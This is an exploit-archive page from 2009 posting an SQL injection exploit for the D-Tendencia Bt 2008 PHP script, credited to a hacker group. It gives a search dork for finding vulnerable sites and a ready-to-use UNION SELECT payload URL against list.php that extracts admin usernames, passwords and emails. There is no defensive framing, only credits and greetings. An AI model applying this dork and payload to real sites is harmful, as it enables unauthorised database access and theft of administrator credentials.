[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : D-Tendencia Bt 2008 SQL Injection Vulnerability
# Published : 2009-12-16
# Author : Dr.0rYX and Cr3w-DZ
# Previous Title : WHMCompleteSolution CMS sql Injection Vulnerability
# Next Title : PhpLinkExchange v1.02 - XSS/Upload Vulerability
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] D-Tendencia Bt 2008 SQL Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.autoabc.hu/
[+] script : D-Tendencia Bt 2008
[+] Download : http://www.autoabc.hu/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"list.php?lcat_id="
**************************************************************************/
[ Vulnerable File ]
http://server/list.php?lcat_id=[N.A.S.T ]
[ Exploit ]
http://server/list.php?lcat_id=-1+union+select+concat(admin_name,0x3a,admin_pass,0x3a,admin_mail)+from+admin
[ GReets ]
[+] :claw , le0n ,his0k4 , WWW.exploit-db.com , ALL HACKERS MUSLIMS